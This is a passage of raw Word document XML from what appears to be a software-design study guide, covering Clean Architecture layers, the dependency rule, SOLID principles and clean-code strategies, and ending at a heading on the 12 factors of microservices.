      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (entities, use cases, domain rules). This is the most stable part of the system and is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>framework agnostic</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32BF9C"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Use Case Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Contains the application's business rules and services that orchestrate the logic, define workflows, and interact with the domain entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EDB1E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nterface Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Contains </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>interface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abstractions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> through which external systems (e.g., databases, UI, external APIs) interact with the core business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CE591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rameworks and Drivers Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: The outermost layer, containing external components like databases, web frameworks, UI components, and libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C71F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Dependency Rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDDE51"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Direction of Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: In Clean Architecture, dependencies always point </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>inward</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, from concrete implementations to more abstract layers. The core logic and use cases should not depend on external libraries or frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276700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ependency Inversion</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: The outer layers depend on interfaces, and the inner layers provide the implementation details. This decouples business logic from infrastructure and makes the system more maintainable and extensible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B411D5"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pict w14:anchorId="06A65767">
          <v:rect id="_x0000_i7537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1D04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SOLID Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331414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SOLID is an acronym for five design principles that are essential for clean and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A364B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ingle Responsibility Principle (SRP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – A class should have one, and only one, reason to change. In other words, it should have only one responsibility or job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AB0D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O</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Open/Closed Principle (OCP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Software entities (classes, modules, functions, etc.) should be open for extension but closed for modification. This means you can add new functionality without changing existing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F208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L</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Liskov Substitution Principle (LSP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Objects of a superclass should be replaceable with objects of a subclass without affecting the functionality of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CF3DD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I</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Interface Segregation Principle (ISP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Clients should not be forced to depend on interfaces they do not use. It's better to have multiple smaller interfaces than one large, all-encompassing interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183814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Dependency Inversion Principle (DIP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – High-level modules should not depend on low-level modules. Both should depend on abstractions (e.g., interfaces), and abstractions should not depend on details; details should depend on abstractions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03280D"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pict w14:anchorId="3673D100">
          <v:rect id="_x0000_i7538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2481D1"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Key Clean Code Architecture Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C951BF1"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These strategies help in structuring your application to achieve clean code, scalability, and maintainability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5DF7D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a. Separation of Concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9E6B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Ensure that each class, method, or module has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>single responsibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. This minimizes the risk of changes affecting other parts of the system and makes it easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815052C"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 Dependency Injection (DI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39744B2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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage dependencies between classes. This makes the system more flexible and decouples classes from their dependencies, enabling easier testing and maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D737BF8"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 Layered Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267B56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Organize the application into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>layers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., data access, service, business logic, and presentation). Each layer should be independent and communicate with other layers via well-defined interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7283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d. Encapsulation and Abstraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF23EB"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Keep </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>implementation details</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden from other parts of the system by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>encapsulation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. Abstract away complex logic into separate classes or modules, providing clean and simple interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D1C8F5"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 Avoid Premature Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78174FF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Focus on writing </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>clean, simple, and correct</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> code first. Optimize the code later, once you have identified bottlenecks through profiling and testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164C0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f. Favor Composition over Inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D76C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Prefer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>composition</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using interfaces and delegation) over </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>. Composition provides greater flexibility and allows easier modifications without altering the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831C658"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g. Use of Design Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892FDF4"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code architecture often makes use of common </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Factor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ingleton</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trateg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Observer</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to solve recurring problems in a structured and maintainable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2552B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h. Test-Driven Development (TDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E3A8A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Follow </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>TDD</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles by writing </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>unit tests</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> before implementing the actual code. This ensures that code is </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>testabl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maintains quality</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the project evolves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC9C48B"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i. Minimize Coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5385D2F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im to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>reduce dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> between classes and modules. This allows for easier changes and testing, as isolated components can be updated or replaced without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFB896D"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pict w14:anchorId="1425CAE3">
          <v:rect id="_x0000_i7539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD3F4CF"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Benefits of Clean Code Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01639DB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intainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Clean, well-structured code is easier to maintain and update as new requirements arise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A63A5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The use of modular, decoupled components makes it easier to scale the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518F2A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Testability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: The code is more testable due to separation of concerns and dependency injection, making it easier to write unit tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19229856"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The system can more easily accommodate new features without major rework, thanks to SOLID principles and clean separation between layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AEBA3"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Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Teams can collaborate more effectively, as the code is easier to read and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726EC898"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pict w14:anchorId="08E530CC">
          <v:rect id="_x0000_i7540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F125D24"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1E8BF38A"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lean Code Architecture is a design philosophy that prioritizes maintainability, readability, and flexibility in the development process. By adhering to principles like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>SOLI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eparation of Concerns</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ependency Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>, you ensure that your code remains adaptable to change and scalable as your system grows. Following Clean Code guidelines leads to code that is easier to manage, less error-prone, and more resilient in the face of new requirements and technology changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0AB737" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="5B8DBCC7">
          <v:rect id="_x0000_i7531" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0823C121"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r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkStart w:id="743" w:name="_Toc197867957"/>
      <w:r w:rsidRPr="00585F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain 12 factors of microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="743"/>
    </w:p>
    <w:p w14:paraId="5EB4C41C" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00585F60" w:rsidRDefault="000B09B5" w:rsidP="00585F60">
      <w:pPr>
